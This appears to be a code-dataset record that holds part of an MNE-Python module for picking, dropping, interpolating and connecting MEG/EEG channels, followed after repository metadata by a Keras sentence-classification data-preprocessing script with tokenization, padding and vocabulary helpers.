Whether to display all channel names. If an array, only the channel
names in the array are shown. Defaults to False.
ch_groups : 'position' | array of shape (n_ch_groups, n_picks) | None
Channel groups for coloring the sensors. If None (default), default
coloring scheme is used. If 'position', the sensors are divided
into 8 regions. See ``order`` kwarg of :func:`mne.viz.plot_raw`. If
array, the channels are divided by picks given in the array.
.. versionadded:: 0.13.0
to_sphere : bool
Whether to project the 3d locations to a sphere. When False, the
sensor array appears similar as to looking downwards straight above
the subject's head. Has no effect when kind='3d'. Defaults to True.
.. versionadded:: 0.14.0
axes : instance of Axes | instance of Axes3D | None
Axes to draw the sensors to. If ``kind='3d'``, axes must be an
instance of Axes3D. If None (default), a new axes will be created.
.. versionadded:: 0.13.0
block : bool
Whether to halt program execution until the figure is closed.
Defaults to False.
.. versionadded:: 0.13.0
show : bool
Show figure if True. Defaults to True.
Returns
-------
fig : instance of Figure
Figure containing the sensor topography.
selection : list
A list of selected channels. Only returned if ``kind=='select'``.
See Also
--------
mne.viz.plot_layout
Notes
-----
This function plots the sensor locations from the info structure using
matplotlib. For drawing the sensors using mayavi see
:func:`mne.viz.plot_alignment`.
.. versionadded:: 0.12.0
"""
from ..viz.utils import plot_sensors
return plot_sensors(self.info, kind=kind, ch_type=ch_type, title=title,
show_names=show_names, ch_groups=ch_groups,
to_sphere=to_sphere, axes=axes, block=block,
show=show)
@copy_function_doc_to_method_doc(anonymize_info)
def anonymize(self):
"""
.. versionadded:: 0.13.0
"""
anonymize_info(self.info)
if hasattr(self, 'annotations'):
# XXX : anonymize should rather subtract a random date
# rather than setting it to None
self.annotations.orig_time = None
self.annotations.onset -= self._first_time
return self
class UpdateChannelsMixin(object):
"""Mixin class for Raw, Evoked, Epochs, AverageTFR."""
@verbose
def pick_types(self, meg=True, eeg=False, stim=False, eog=False,
ecg=False, emg=False, ref_meg='auto', misc=False,
resp=False, chpi=False, exci=False, ias=False, syst=False,
seeg=False, dipole=False, gof=False, bio=False, ecog=False,
fnirs=False, include=(), exclude='bads', selection=None,
verbose=None):
"""Pick some channels by type and names.
Parameters
----------
meg : bool | str
            If True include all MEG channels. If False include None.
If string it can be 'mag', 'grad', 'planar1' or 'planar2' to select
only magnetometers, all gradiometers, or a specific type of
gradiometer.
eeg : bool
If True include EEG channels.
stim : bool
If True include stimulus channels.
eog : bool
If True include EOG channels.
ecg : bool
If True include ECG channels.
emg : bool
If True include EMG channels.
        ref_meg : bool | str
If True include CTF / 4D reference channels. If 'auto', the
reference channels are only included if compensations are present.
misc : bool
If True include miscellaneous analog channels.
resp : bool
If True include response-trigger channel. For some MEG systems this
is separate from the stim channel.
chpi : bool
If True include continuous HPI coil channels.
exci : bool
Flux excitation channel used to be a stimulus channel.
ias : bool
Internal Active Shielding data (maybe on Triux only).
syst : bool
System status channel information (on Triux systems only).
seeg : bool
Stereotactic EEG channels.
dipole : bool
Dipole time course channels.
gof : bool
Dipole goodness of fit channels.
bio : bool
Bio channels.
ecog : bool
Electrocorticography channels.
fnirs : bool | str
Functional near-infrared spectroscopy channels. If True include all
fNIRS channels. If False (default) include none. If string it can
be 'hbo' (to include channels measuring oxyhemoglobin) or 'hbr' (to
include channels measuring deoxyhemoglobin).
include : list of string
List of additional channels to include. If empty do not include
any.
exclude : list of string | str
List of channels to exclude. If 'bads' (default), exclude channels
in ``info['bads']``.
selection : list of string
Restrict sensor channels (MEG, EEG) to this list of channel names.
%(verbose_meth)s
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
pick_channels
Notes
-----
.. versionadded:: 0.9.0
"""
idx = pick_types(
self.info, meg=meg, eeg=eeg, stim=stim, eog=eog, ecg=ecg, emg=emg,
ref_meg=ref_meg, misc=misc, resp=resp, chpi=chpi, exci=exci,
ias=ias, syst=syst, seeg=seeg, dipole=dipole, gof=gof, bio=bio,
ecog=ecog, fnirs=fnirs, include=include, exclude=exclude,
selection=selection)
return self._pick_drop_channels(idx)
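    # Illustrative call (not part of the original module), assuming a Raw instance
    # ``raw``: keep gradiometers plus EEG and EOG channels and drop everything else:
    #
    #     raw.pick_types(meg='grad', eeg=True, eog=True)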
def pick_channels(self, ch_names):
"""Pick some channels.
Parameters
----------
ch_names : list
The list of channels to select.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
pick_types
reorder_channels
Notes
-----
The channel names given are assumed to be a set, i.e. the order
does not matter. The original order of the channels is preserved.
You can use ``reorder_channels`` to set channel order if necessary.
.. versionadded:: 0.9.0
"""
return self._pick_drop_channels(
pick_channels(self.info['ch_names'], ch_names))
@fill_doc
def pick(self, picks, exclude=()):
"""Pick a subset of channels.
Parameters
----------
%(picks_all)s
exclude : list | str
Set of channels to exclude, only used when picking based on
types (e.g., exclude="bads" when picks="meg").
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
"""
picks = _picks_to_idx(self.info, picks, 'all', exclude,
allow_empty=False)
return self._pick_drop_channels(picks)
def reorder_channels(self, ch_names):
"""Reorder channels.
Parameters
----------
ch_names : list
The desired channel order.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
pick_types
pick_channels
Notes
-----
Channel names must be unique. Channels that are not in ``ch_names``
are dropped.
.. versionadded:: 0.16.0
"""
_check_excludes_includes(ch_names)
idx = list()
for ch_name in ch_names:
ii = self.ch_names.index(ch_name)
if ii in idx:
raise ValueError('Channel name repeated: %s' % (ch_name,))
idx.append(ii)
return self._pick_drop_channels(idx)
def drop_channels(self, ch_names):
"""Drop channel(s).
Parameters
----------
ch_names : iterable or str
Iterable (e.g. list) of channel name(s) or channel name to remove.
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
reorder_channels
pick_channels
pick_types
Notes
-----
.. versionadded:: 0.9.0
"""
if isinstance(ch_names, str):
ch_names = [ch_names]
try:
all_str = all([isinstance(ch, str) for ch in ch_names])
except TypeError:
raise ValueError("'ch_names' must be iterable, got "
"type {} ({}).".format(type(ch_names), ch_names))
if not all_str:
raise ValueError("Each element in 'ch_names' must be str, got "
"{}.".format([type(ch) for ch in ch_names]))
missing = [ch for ch in ch_names if ch not in self.ch_names]
if len(missing) > 0:
msg = "Channel(s) {0} not found, nothing dropped."
raise ValueError(msg.format(", ".join(missing)))
bad_idx = [self.ch_names.index(ch) for ch in ch_names
if ch in self.ch_names]
idx = np.setdiff1d(np.arange(len(self.ch_names)), bad_idx)
return self._pick_drop_channels(idx)
def _pick_drop_channels(self, idx):
# avoid circular imports
from ..time_frequency import AverageTFR, EpochsTFR
_check_preload(self, 'adding, dropping, or reordering channels')
if getattr(self, 'picks', None) is not None:
self.picks = self.picks[idx]
if hasattr(self, '_cals'):
self._cals = self._cals[idx]
pick_info(self.info, idx, copy=False)
if getattr(self, '_projector', None) is not None:
self._projector = self._projector[idx][:, idx]
# All others (Evoked, Epochs, Raw) have chs axis=-2
axis = -3 if isinstance(self, (AverageTFR, EpochsTFR)) else -2
self._data = self._data.take(idx, axis=axis)
return self
def add_channels(self, add_list, force_update_info=False):
"""Append new channels to the instance.
Parameters
----------
add_list : list
A list of objects to append to self. Must contain all the same
type as the current object
force_update_info : bool
If True, force the info for objects to be appended to match the
values in `self`. This should generally only be used when adding
stim channels for which important metadata won't be overwritten.
.. versionadded:: 0.12
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
See Also
--------
drop_channels
Notes
-----
If ``self`` is a Raw instance that has been preloaded into a
:obj:`numpy.memmap` instance, the memmap will be resized.
"""
# avoid circular imports
from ..io import BaseRaw, _merge_info
from ..epochs import BaseEpochs
_validate_type(add_list, (list, tuple), 'Input')
# Object-specific checks
for inst in add_list + [self]:
_check_preload(inst, "adding channels")
if isinstance(self, BaseRaw):
con_axis = 0
comp_class = BaseRaw
elif isinstance(self, BaseEpochs):
con_axis = 1
comp_class = BaseEpochs
else:
con_axis = 0
comp_class = type(self)
for inst in add_list:
_validate_type(inst, comp_class, 'All input')
data = [inst._data for inst in [self] + add_list]
# Make sure that all dimensions other than channel axis are the same
compare_axes = [i for i in range(data[0].ndim) if i != con_axis]
shapes = np.array([dat.shape for dat in data])[:, compare_axes]
for shape in shapes:
if not ((shapes[0] - shape) == 0).all():
raise AssertionError('All data dimensions except channels '
'must match, got %s != %s'
% (shapes[0], shape))
del shapes
# Create final data / info objects
infos = [self.info] + [inst.info for inst in add_list]
new_info = _merge_info(infos, force_update_to_first=force_update_info)
# Now update the attributes
if isinstance(self._data, np.memmap) and con_axis == 0 and \
sys.platform != 'darwin': # resizing not available--no mremap
# Use a resize and fill in other ones
out_shape = (sum(d.shape[0] for d in data),) + data[0].shape[1:]
n_bytes = np.prod(out_shape) * self._data.dtype.itemsize
self._data.flush()
self._data.base.resize(n_bytes)
self._data = np.memmap(self._data.filename, mode='r+',
dtype=self._data.dtype, shape=out_shape)
assert self._data.shape == out_shape
assert self._data.nbytes == n_bytes
offset = len(data[0])
for d in data[1:]:
this_len = len(d)
self._data[offset:offset + this_len] = d
offset += this_len
else:
self._data = np.concatenate(data, axis=con_axis)
self.info = new_info
if isinstance(self, BaseRaw):
self._cals = np.concatenate([getattr(inst, '_cals')
for inst in [self] + add_list])
return self
class InterpolationMixin(object):
"""Mixin class for Raw, Evoked, Epochs."""
@verbose
def interpolate_bads(self, reset_bads=True, mode='accurate',
origin=(0., 0., 0.04), verbose=None):
"""Interpolate bad MEG and EEG channels.
Operates in place.
Parameters
----------
reset_bads : bool
If True, remove the bads from info.
mode : str
Either ``'accurate'`` or ``'fast'``, determines the quality of the
Legendre polynomial expansion used for interpolation of MEG
channels.
origin : array-like, shape (3,) | str
Origin of the sphere in the head coordinate frame and in meters.
Can be ``'auto'``, which means a head-digitization-based origin
fit. Default is ``(0., 0., 0.04)``.
.. versionadded:: 0.17
%(verbose_meth)s
Returns
-------
inst : instance of Raw, Epochs, or Evoked
The modified instance.
Notes
-----
.. versionadded:: 0.9.0
"""
from .interpolation import _interpolate_bads_eeg, _interpolate_bads_meg
_check_preload(self, "interpolation")
if len(self.info['bads']) == 0:
warn('No bad channels to interpolate. Doing nothing...')
return self
_interpolate_bads_eeg(self)
_interpolate_bads_meg(self, mode=mode, origin=origin)
if reset_bads is True:
self.info['bads'] = []
return self
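# --- Hedged usage sketch (added; not part of the original module) ---
# Illustrates how the mixin methods above might be combined on a hypothetical,
# preloaded Raw instance; the channel names below are illustrative only.
def _example_channel_workflow(raw):
    """Minimal sketch: keep MEG/EEG, drop a channel, then interpolate bads."""
    raw.pick_types(meg=True, eeg=True, exclude='bads')  # keep only MEG/EEG channels
    raw.drop_channels(['EEG 001'])                      # hypothetical channel name
    raw.info['bads'] = ['MEG 2443']                     # mark a (hypothetical) bad channel
    raw.interpolate_bads(reset_bads=True, mode='accurate')
    return raw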
def rename_channels(info, mapping):
"""Rename channels.
.. warning:: The channel names must have at most 15 characters
Parameters
----------
info : dict
Measurement info.
mapping : dict | callable
a dictionary mapping the old channel to a new channel name
e.g. {'EEG061' : 'EEG161'}. Can also be a callable function
that takes and returns a string (new in version 0.10.0).
"""
info._check_consistency()
bads = list(info['bads']) # make our own local copies
ch_names = list(info['ch_names'])
# first check and assemble clean mappings of index and name
if isinstance(mapping, dict):
orig_names = sorted(list(mapping.keys()))
missing = [orig_name not in ch_names for orig_name in orig_names]
if any(missing):
raise ValueError("Channel name(s) in mapping missing from info: "
"%s" % np.array(orig_names)[np.array(missing)])
new_names = [(ch_names.index(ch_name), new_name)
for ch_name, new_name in mapping.items()]
elif callable(mapping):
new_names = [(ci, mapping(ch_name))
for ci, ch_name in enumerate(ch_names)]
else:
raise ValueError('mapping must be callable or dict, not %s'
% (type(mapping),))
# check we got all strings out of the mapping
for new_name in new_names:
_validate_type(new_name[1], 'str', 'New channel mappings')
bad_new_names = [name for _, name in new_names if len(name) > 15]
if len(bad_new_names):
raise ValueError('Channel names cannot be longer than 15 '
'characters. These channel names are not '
'valid : %s' % new_names)
# do the remapping locally
for c_ind, new_name in new_names:
for bi, bad in enumerate(bads):
if bad == ch_names[c_ind]:
bads[bi] = new_name
ch_names[c_ind] = new_name
# check that all the channel names are unique
if len(ch_names) != len(np.unique(ch_names)):
raise ValueError('New channel names are not unique, renaming failed')
# do the remapping in info
info['bads'] = bads
for ch, ch_name in zip(info['chs'], ch_names):
ch['ch_name'] = ch_name
info._update_redundant()
info._check_consistency()
def _recursive_flatten(cell, dtype):
"""Unpack mat files in Python."""
if len(cell) > 0:
while not isinstance(cell[0], dtype):
cell = [c for d in cell for c in d]
return cell
@fill_doc
def read_ch_connectivity(fname, picks=None):
"""Parse FieldTrip neighbors .mat file.
More information on these neighbor definitions can be found on the related
`FieldTrip documentation pages
<http://www.fieldtrip.org/template/neighbours>`__.
Parameters
----------
fname : str
The file name. Example: 'neuromag306mag', 'neuromag306planar',
'ctf275', 'biosemi64', etc.
%(picks_all)s
        Picks must match the template.
Returns
-------
ch_connectivity : scipy.sparse.csr_matrix, shape (n_channels, n_channels)
The connectivity matrix.
ch_names : list
The list of channel names present in connectivity matrix.
See Also
--------
find_ch_connectivity
Notes
-----
This function is closely related to :func:`find_ch_connectivity`. If you
don't know the correct file for the neighbor definitions,
:func:`find_ch_connectivity` can compute the connectivity matrix from 2d
sensor locations.
"""
from scipy.io import loadmat
if not op.isabs(fname):
templates_dir = op.realpath(op.join(op.dirname(__file__),
'data', 'neighbors'))
templates = os.listdir(templates_dir)
for f in templates:
if f == fname:
break
if f == fname + '_neighb.mat':
fname += '_neighb.mat'
break
else:
raise ValueError('I do not know about this neighbor '
'template: "{}"'.format(fname))
fname = op.join(templates_dir, fname)
nb = loadmat(fname)['neighbours']
ch_names = _recursive_flatten(nb['label'], str)
picks = _picks_to_idx(len(ch_names), picks)
neighbors = [_recursive_flatten(c, str) for c in
nb['neighblabel'].flatten()]
assert len(ch_names) == len(neighbors)
connectivity = _ch_neighbor_connectivity(ch_names, neighbors)
# picking before constructing matrix is buggy
connectivity = connectivity[picks][:, picks]
ch_names = [ch_names[p] for p in picks]
return connectivity, ch_names
def _ch_neighbor_connectivity(ch_names, neighbors):
"""Compute sensor connectivity matrix.
Parameters
----------
ch_names : list of str
The channel names.
neighbors : list of list
A list of list of channel names. The neighbors to
which the channels in ch_names are connected with.
Must be of the same length as ch_names.
Returns
-------
ch_connectivity : scipy.sparse matrix
The connectivity matrix.
"""
if len(ch_names) != len(neighbors):
raise ValueError('`ch_names` and `neighbors` must '
'have the same length')
set_neighbors = {c for d in neighbors for c in d}
rest = set_neighbors - set(ch_names)
if len(rest) > 0:
raise ValueError('Some of your neighbors are not present in the '
'list of channel names')
for neigh in neighbors:
if (not isinstance(neigh, list) and
not all(isinstance(c, str) for c in neigh)):
raise ValueError('`neighbors` must be a list of lists of str')
ch_connectivity = np.eye(len(ch_names), dtype=bool)
for ii, neigbs in enumerate(neighbors):
ch_connectivity[ii, [ch_names.index(i) for i in neigbs]] = True
ch_connectivity = sparse.csr_matrix(ch_connectivity)
return ch_connectivity
def find_ch_connectivity(info, ch_type):
"""Find the connectivity matrix for the given channels.
This function tries to infer the appropriate connectivity matrix template
for the given channels. If a template is not found, the connectivity matrix
is computed using Delaunay triangulation based on 2d sensor locations.
Parameters
----------
info : instance of Info
The measurement info.
ch_type : str | None
The channel type for computing the connectivity matrix. Currently
supports 'mag', 'grad', 'eeg' and None. If None, the info must contain
only one channel type.
Returns
-------
ch_connectivity : scipy.sparse.csr_matrix, shape (n_channels, n_channels)
The connectivity matrix.
ch_names : list
The list of channel names present in connectivity matrix.
See Also
--------
read_ch_connectivity
Notes
-----
.. versionadded:: 0.15
Automatic detection of an appropriate connectivity matrix template only
works for MEG data at the moment. This means that the connectivity matrix
is always computed for EEG data and never loaded from a template file. If
you want to load a template for a given montage use
:func:`read_ch_connectivity` directly.
"""
if ch_type is None:
picks = channel_indices_by_type(info)
if sum([len(p) != 0 for p in picks.values()]) != 1:
raise ValueError('info must contain only one channel type if '
'ch_type is None.')
ch_type = channel_type(info, 0)
else:
_check_option('ch_type', ch_type, ['mag', 'grad', 'eeg'])
(has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
has_eeg_coils_and_meg, has_eeg_coils_only,
has_neuromag_122_grad) = _get_ch_info(info)
conn_name = None
if has_vv_mag and ch_type == 'mag':
conn_name = 'neuromag306mag'
elif has_vv_grad and ch_type == 'grad':
conn_name = 'neuromag306planar'
elif has_neuromag_122_grad:
conn_name = 'neuromag122'
elif has_4D_mag:
if 'MEG 248' in info['ch_names']:
idx = info['ch_names'].index('MEG 248')
grad = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_GRAD
mag = info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG
if ch_type == 'grad' and grad:
conn_name = 'bti248grad'
elif ch_type == 'mag' and mag:
conn_name = 'bti248'
elif 'MEG 148' in info['ch_names'] and ch_type == 'mag':
idx = info['ch_names'].index('MEG 148')
if info['chs'][idx]['coil_type'] == FIFF.FIFFV_COIL_MAGNES_MAG:
conn_name = 'bti148'
elif has_CTF_grad and ch_type == 'mag':
if info['nchan'] < 100:
conn_name = 'ctf64'
elif info['nchan'] > 200:
conn_name = 'ctf275'
else:
conn_name = 'ctf151'
elif n_kit_grads > 0:
from ..io.kit.constants import KIT_NEIGHBORS
conn_name = KIT_NEIGHBORS.get(info['kit_system_id'])
if conn_name is not None:
logger.info('Reading connectivity matrix for %s.' % conn_name)
return read_ch_connectivity(conn_name)
logger.info('Could not find a connectivity matrix for the data. '
'Computing connectivity based on Delaunay triangulations.')
return _compute_ch_connectivity(info, ch_type)
def _compute_ch_connectivity(info, ch_type):
"""Compute channel connectivity matrix using Delaunay triangulations.
Parameters
----------
    info : instance of Info
The measurement info.
ch_type : str
The channel type for computing the connectivity matrix. Currently
supports 'mag', 'grad' and 'eeg'.
Returns
-------
ch_connectivity : scipy.sparse matrix, shape (n_channels, n_channels)
The connectivity matrix.
ch_names : list
The list of channel names present in connectivity matrix.
"""
from scipy.spatial import Delaunay
from .. import spatial_tris_connectivity
from ..channels.layout import _auto_topomap_coords, _pair_grad_sensors
combine_grads = (ch_type == 'grad' and FIFF.FIFFV_COIL_VV_PLANAR_T1 in
np.unique([ch['coil_type'] for ch in info['chs']]))
picks = dict(_picks_by_type(info, exclude=[]))[ch_type]
ch_names = [info['ch_names'][pick] for pick in picks]
if combine_grads:
pairs = _pair_grad_sensors(info, topomap_coords=False, exclude=[])
if len(pairs) != len(picks):
raise RuntimeError('Cannot find a pair for some of the '
'gradiometers. Cannot compute connectivity '
'matrix.')
xy = _auto_topomap_coords(info, picks[::2]) # only for one of the pair
else:
xy = _auto_topomap_coords(info, picks)
tri = Delaunay(xy)
neighbors = spatial_tris_connectivity(tri.simplices)
if combine_grads:
ch_connectivity = np.eye(len(picks), dtype=bool)
for idx, neigbs in zip(neighbors.row, neighbors.col):
for ii in range(2): # make sure each pair is included
for jj in range(2):
ch_connectivity[idx * 2 + ii, neigbs * 2 + jj] = True
ch_connectivity[idx * 2 + ii, idx * 2 + jj] = True # pair
ch_connectivity = sparse.csr_matrix(ch_connectivity)
else:
ch_connectivity = sparse.lil_matrix(neighbors)
ch_connectivity.setdiag(np.repeat(1, ch_connectivity.shape[0]))
ch_connectivity = ch_connectivity.tocsr()
return ch_connectivity, ch_names
def fix_mag_coil_types(info):
"""Fix magnetometer coil types.
Parameters
----------
info : dict
The info dict to correct. Corrections are done in-place.
Notes
-----
This function changes magnetometer coil types 3022 (T1: SQ20483N) and
3023 (T2: SQ20483-A) to 3024 (T3: SQ20950N) in the channel definition
records in the info structure.
Neuromag Vectorview systems can contain magnetometers with two
different coil sizes (3022 and 3023 vs. 3024). The systems
incorporating coils of type 3024 were introduced last and are used at
the majority of MEG sites. At some sites with 3024 magnetometers,
the data files have still defined the magnetometers to be of type
3022 to ensure compatibility with older versions of Neuromag software.
In the MNE software as well as in the present version of Neuromag
software coil type 3024 is fully supported. Therefore, it is now safe
to upgrade the data files to use the true coil type.
.. note:: The effect of the difference between the coil sizes on the
current estimates computed by the MNE software is very small.
Therefore the use of ``fix_mag_coil_types`` is not mandatory.
"""
old_mag_inds = _get_T1T2_mag_inds(info)
for ii in old_mag_inds:
info['chs'][ii]['coil_type'] = FIFF.FIFFV_COIL_VV_MAG_T3
logger.info('%d of %d T1/T2 magnetometer types replaced with T3.' %
(len(old_mag_inds), len(pick_types(info, meg='mag'))))
info._check_consistency()
def _get_T1T2_mag_inds(info):
"""Find T1/T2 magnetometer coil types."""
picks = pick_types(info, meg='mag')
old_mag_inds = []
for ii in picks:
ch = info['chs'][ii]
if ch['coil_type'] in (FIFF.FIFFV_COIL_VV_MAG_T1,
FIFF.FIFFV_COIL_VV_MAG_T2):
old_mag_inds.append(ii)
return old_mag_inds
def _get_ch_info(info):
"""Get channel info for inferring acquisition device."""
chs = info['chs']
# Only take first 16 bits, as higher bits store CTF comp order
coil_types = {ch['coil_type'] & 0xFFFF for ch in chs}
channel_types = {ch['kind'] for ch in chs}
has_vv_mag = any(k in coil_types for k in
[FIFF.FIFFV_COIL_VV_MAG_T1, FIFF.FIFFV_COIL_VV_MAG_T2,
FIFF.FIFFV_COIL_VV_MAG_T3])
has_vv_grad = any(k in coil_types for k in [FIFF.FIFFV_COIL_VV_PLANAR_T1,
FIFF.FIFFV_COIL_VV_PLANAR_T2,
FIFF.FIFFV_COIL_VV_PLANAR_T3])
has_neuromag_122_grad = any(k in coil_types
for k in [FIFF.FIFFV_COIL_NM_122])
is_old_vv = ' ' in chs[0]['ch_name']
has_4D_mag = FIFF.FIFFV_COIL_MAGNES_MAG in coil_types
ctf_other_types = (FIFF.FIFFV_COIL_CTF_REF_MAG,
FIFF.FIFFV_COIL_CTF_REF_GRAD,
FIFF.FIFFV_COIL_CTF_OFFDIAG_REF_GRAD)
has_CTF_grad = (FIFF.FIFFV_COIL_CTF_GRAD in coil_types or
(FIFF.FIFFV_MEG_CH in channel_types and
any(k in ctf_other_types for k in coil_types)))
# hack due to MNE-C bug in IO of CTF
# only take first 16 bits, as higher bits store CTF comp order
n_kit_grads = sum(ch['coil_type'] & 0xFFFF == FIFF.FIFFV_COIL_KIT_GRAD
for ch in chs)
has_any_meg = any([has_vv_mag, has_vv_grad, has_4D_mag, has_CTF_grad,
n_kit_grads])
has_eeg_coils = (FIFF.FIFFV_COIL_EEG in coil_types and
FIFF.FIFFV_EEG_CH in channel_types)
has_eeg_coils_and_meg = has_eeg_coils and has_any_meg
has_eeg_coils_only = has_eeg_coils and not has_any_meg
return (has_vv_mag, has_vv_grad, is_old_vv, has_4D_mag, ctf_other_types,
has_CTF_grad, n_kit_grads, has_any_meg, has_eeg_coils,
has_eeg_coils_and_meg, has_eeg_coils_only, has_neuromag_122_grad)
def make_1020_channel_selections(info, midline="z"):
"""Return dict mapping from ROI names to lists of picks for 10/20 setups.
This passes through all channel names, and uses a simple heuristic to
separate channel names into three Region of Interest-based selections:
Left, Midline and Right. The heuristic is that channels ending on any of
the characters in `midline` are filed under that heading, otherwise those
ending in odd numbers under "Left", those in even numbers under "Right".
Other channels are ignored. This is appropriate for 10/20 files, but not
for other channel naming conventions.
If an info object is provided, lists are sorted from posterior to anterior.
Parameters
----------
info : instance of Info
Where to obtain the channel names from. The picks will
        be in relation to the position in `info["ch_names"]`. If possible,
        the lists will be sorted by the y position of the channel locations,
        i.e., from back to front.
midline : str
Names ending in any of these characters are stored under the `Midline`
key. Defaults to 'z'. Note that capitalization is ignored.
Returns
-------
selections : dict
A dictionary mapping from ROI names to lists of picks (integers).
"""
_validate_type(info, "info")
try:
from .layout import find_layout
layout = find_layout(info)
pos = layout.pos
ch_names = layout.names
except RuntimeError: # no channel positions found
ch_names = info["ch_names"]
pos = None
selections = dict(Left=[], Midline=[], Right=[])
for pick, channel in enumerate(ch_names):
last_char = channel[-1].lower() # in 10/20, last char codes hemisphere
if last_char in midline:
selection = "Midline"
elif last_char.isdigit():
selection = "Left" if int(last_char) % 2 else "Right"
else: # ignore the channel
continue
selections[selection].append(pick)
if pos is not None:
        # sort channels from back (posterior) to front (anterior), using the
        # y-coordinate of the position info in the layout
selections = {selection: np.array(picks)[pos[picks, 1].argsort()]
for selection, picks in selections.items()}
return selections
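# Hedged illustration (added): the heuristic above files channels by their
# last character -- characters in `midline` go to "Midline", odd digits to
# "Left", even digits to "Right".  With hypothetical names
# ['Fp1', 'Fp2', 'Cz'] the expected grouping is Left=[0], Right=[1],
# Midline=[2] (indices into info["ch_names"]).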
avg_line_length: 37.603484 | max_line_length: 79 | alphanum_fraction: 0.588592

hexsha: 8d00568c0692ef921dd0bbda0eefcab73493f0ce | size: 7,705 | ext: py | lang: Python
max_stars_repo: data_helpers.py | alexeyev/CNN-for-Sentence-Classification-in-Keras | 1a011950b9256f1c6da5b7f46dd6826fb2a3bafe | ["MIT"] | stars: 7 | 2016-09-29T09:46:13.000Z to 2018-05-23T09:29:38.000Z
max_issues_repo: data_helpers.py | alexeyev/CNN-for-Sentence-Classification-in-Keras | 1a011950b9256f1c6da5b7f46dd6826fb2a3bafe | ["MIT"] | issues: null
max_forks_repo: data_helpers.py | alexeyev/CNN-for-Sentence-Classification-in-Keras | 1a011950b9256f1c6da5b7f46dd6826fb2a3bafe | ["MIT"] | forks: 1 | 2019-07-02T06:26:59.000Z to 2019-07-02T06:26:59.000Z
# coding:utf-8
"""
Custom datasets reading and preprocessing routines
"""
import itertools
import re
from collections import Counter
import numpy as np
import pandas as pd
import pymystem3
mystem = pymystem3.Mystem()
def clean_str(string):
"""
Tokenization/string cleaning for all datasets except for SST.
Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py
"""
string = re.sub(r"[^A-Za-zА-Яа-я0-9(),!?\'\`]", " ", string)
string = re.sub(r"\'s", " \'s", string)
string = re.sub(r"\'ve", " \'ve", string)
string = re.sub(r"n\'t", " n\'t", string)
string = re.sub(r"\'re", " \'re", string)
string = re.sub(r"\'d", " \'d", string)
string = re.sub(r"\'ll", " \'ll", string)
string = re.sub(r",", " , ", string)
string = re.sub(r"!", " ! ", string)
string = re.sub(r"\(", " \( ", string)
string = re.sub(r"\)", " \) ", string)
string = re.sub(r"\?", " \? ", string)
string = re.sub(r"\s{2,}", " ", string)
return string.strip().lower()
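# Hedged example (added): clean_str separates punctuation and contractions
# and lowercases the result, e.g.
#   clean_str("It's great, isn't it!") -> "it 's great , is n't it !"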
def load_data_and_labels_pos_neg():
"""
Loads MR polarity data from files, splits the data into words and generates labels.
Returns split sentences and labels.
"""
# Load data from files
positive_examples = list(open("./data/rt-polarity.pos").readlines())
positive_examples = [s.strip() for s in positive_examples]
negative_examples = list(open("./data/rt-polarity.neg").readlines())
negative_examples = [s.strip() for s in negative_examples]
# Split by words
x_text = positive_examples + negative_examples
x_text = [clean_str(sent) for sent in x_text]
x_text = [s.split(" ") for s in x_text]
# Generate labels
positive_labels = [[0, 1] for _ in positive_examples]
negative_labels = [[1, 0] for _ in negative_examples]
y = np.concatenate([positive_labels, negative_labels], 0)
return [x_text, y]
def pad_sentences(sentences, maxlen=56, padding_word="<PAD/>"):
"""
Pads all sentences to the same length.
Returns padded sentences.
"""
sequence_length = maxlen # max(len(x) for x in sentences)
padded_sentences = []
for i in range(len(sentences)):
sentence = sentences[i]
num_padding = max(0, sequence_length - len(sentence))
new_sentence = sentence[:sequence_length] + [padding_word] * num_padding
padded_sentences.append(new_sentence)
return padded_sentences
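# Hedged example (added): with maxlen=5 a three-token sentence is
# right-padded (and longer sentences are truncated), e.g.
#   pad_sentences([["a", "b", "c"]], maxlen=5)
#   -> [["a", "b", "c", "<PAD/>", "<PAD/>"]]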
def build_vocab(sentences):
"""
Builds a vocabulary mapping from word to index based on the sentences.
Returns vocabulary mapping and inverse vocabulary mapping.
"""
# Build vocabulary
word_counts = Counter(itertools.chain(*sentences))
# Mapping from index to word
vocabulary_inv = [x[0] for x in word_counts.most_common()]
# Mapping from word to index
vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}
return [vocabulary, vocabulary_inv]
def build_input_x(sentences, vocabulary):
"""
    Maps sentences to index vectors based on a vocabulary.
"""
x = np.array([[vocabulary[word] for word in sentence] for sentence in sentences])
return x
def build_input_data(sentences, labels, vocabulary):
"""
    Maps sentences and labels to vectors based on a vocabulary.
"""
x = build_input_x(sentences, vocabulary)
y = np.array(labels)
return [x, y]
def load_data_pos_neg():
"""
    Loads and preprocesses data for the MR dataset.
Returns input vectors, labels, vocabulary, and inverse vocabulary.
"""
# Load and preprocess data
sentences, labels = load_data_and_labels_pos_neg()
sentences_padded = pad_sentences(sentences)
vocabulary, vocabulary_inv = build_vocab(sentences_padded)
x, y = build_input_data(sentences_padded, labels, vocabulary)
return [x, y, vocabulary, vocabulary_inv]
def build_word_level_data(train_data, test_data):
sentences_train, labels_train = train_data
sentences_test, labels_test = test_data
sentences_train = [clean_str(sent) for sent in sentences_train]
sentences_train = [mystem.lemmatize(s) for s in sentences_train]
sentences_test = [clean_str(sent) for sent in sentences_test]
sentences_test = [mystem.lemmatize(s) for s in sentences_test]
sentences_train_padded = pad_sentences(list(sentences_train))
sentences_test_padded = pad_sentences(list(sentences_test))
print(" ".join(sentences_train_padded[0]))
vocabulary, vocabulary_inv = \
build_vocab(sentences_train_padded + sentences_test_padded)
x_train, y_train = build_input_data(sentences_train_padded, labels_train, vocabulary)
x_test, y_test = build_input_data(sentences_test_padded, labels_test, vocabulary)
return x_train, y_train, x_test, y_test, vocabulary, vocabulary_inv
def encode_word_level_data(prepared_x, vocabulary):
    x = build_input_x(pad_sentences(list(prepared_x.iloc[:, 0])), vocabulary)
return x
